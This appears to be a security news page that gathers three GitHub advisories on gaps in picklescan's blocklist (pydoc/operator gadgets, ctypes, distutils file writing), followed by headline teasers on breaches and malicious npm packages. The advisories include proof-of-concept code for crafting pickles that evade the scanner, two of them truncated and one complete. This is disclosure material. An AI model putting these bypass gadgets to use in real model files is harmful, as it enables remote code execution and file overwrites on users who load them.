Security

Tag

#git

GHSA-84r2-jw7c-4r5q: Picklescan has Incomplete List of Disallowed Inputs

### Summary

Currently picklescan only blocks some specific functions of the pydoc and operator modules. Attackers can use other functions within these allowed modules to pass undetected and achieve RCE on the final user. In particular:

* pydoc.locate: Can dynamically resolve and import arbitrary modules (e.g., resolving the string "os" to the actual os module).
* operator.methodcaller: Allows executing a method on an object. When combined with a resolved module object, it can execute functions like system.

Since locate and methodcaller are not explicitly listed in the deny-list, picklescan treats them as "Safe" or "Suspicious" (depending on configuration) but does not flag them as "Dangerous", allowing the malicious file to bypass the security check.

### PoC

Use the provided script to create a malicious pickle file:

```python
import pickle
import pydoc
import operator
import os

class ModuleLocator:
    def __init__(self, module_name):
        self.module_name = module_name
...
```

GHSA-4675-36f9-wf6r: Picklescan does not block ctypes

### Summary

Picklescan doesn't flag the ctypes module as a dangerous module, which is a huge issue. ctypes is basically a foreign function interface library and can be used to:

* Load DLLs
* Call C functions directly
* Manipulate memory through raw pointers

This can allow attackers to achieve RCE by invoking direct syscalls without going through blocked modules. Another major issue with allowing ctypes is that it can be used down the line to dismantle interpreter-based Python sandboxes, as ctypes allows direct access to raw memory. This is a more severe loophole than normal gadget chains and bypasses, as raw memory access can be used for a lot of nefarious purposes down the line if left undetected.

### PoC

```python
import pickle
import ctypes
import operator

class Kernel32Loader:
    def __reduce__(self):
        # we go direct to the kerneeellllllll
        return (ctypes.WinDLL, ("kernel32.dll",))

class WinExecGetter:
    def __reduce__(self):
        return (operator.itemgetter("W...
```

GHSA-m273-6v24-x4m4: Picklescan vulnerable to Arbitrary File Writing

### Summary

Picklescan includes open() and shutil in its default dangerous blocklist to prevent arbitrary file overwrites. However, the distutils module isn't blocked and can be used for the same purpose, i.e. to write arbitrary files.

### Details

This is another vulnerability which impacts the downstream user. By constructing a pickle that uses distutils.file_util.write_file, an attacker can overwrite critical system files (like .ssh/authorized_keys, web server configurations, or source code) to achieve DoS or escalate to RCE.

### PoC

```python
import pickle
import distutils.file_util

class FileWriteBypass:
    def __reduce__(self):
        target_file = "pwned_config.env"
        content = ["print('I have overwritten your config')"]
        return (distutils.file_util.write_file, (target_file, content))

payload = pickle.dumps(FileWriteBypass())
with open("bypass_filewrite.pkl", "wb") as f:
    f.write(payload)
print("bypass_filewrite.pkl")
```

⚡ Weekly Recap: MongoDB Attacks, Wallet Breaches, Android Spyware, Insider Crime & More

Last week’s cyber news in 2025 was not about one big incident. It was about many small cracks opening at the same time. Tools people trust every day behave in unexpected ways. Old flaws resurfaced. New ones were used almost immediately. A common theme ran through it all in 2025. Attackers moved faster than fixes. Access meant for work, updates, or support kept getting abused. And damage did not

The Worst Hacks of 2025

From university breaches to cyberattacks that shut down whole supply chains, these were the worst cybersecurity incidents of the year.

The Most Dangerous People on the Internet in 2025

From Donald Trump to DOGE to Chinese hackers, this year the internet’s chaos caused outsize real-world harm.

27 Malicious npm Packages Used as Phishing Infrastructure to Steal Login Credentials

Cybersecurity researchers have disclosed details of what has been described as a "sustained and targeted" spear-phishing campaign that has published over two dozen packages to the npm registry to facilitate credential theft. The activity, which involved uploading 27 npm packages from six different npm aliases, has primarily targeted sales and commercial personnel at critical

A week in security (December 22 – December 28)

A list of topics we covered in the week of December 22 to December 28 of 2025

Traditional Security Frameworks Leave Organizations Exposed to AI-Specific Attack Vectors

In December 2024, the popular Ultralytics AI library was compromised, installing malicious code that hijacked system resources for cryptocurrency mining. In August 2025, malicious Nx packages leaked 2,349 GitHub, cloud, and AI credentials. Throughout 2024, ChatGPT vulnerabilities allowed unauthorized extraction of user data from AI memory. The result: 23.77 million secrets were leaked through AI

Hacker Leaks 2.3M Wired.com Records, Claims 40M-User Condé Nast Breach

A hacker using the alias “Lovely” has leaked what they claim is the personal data of over 2.3…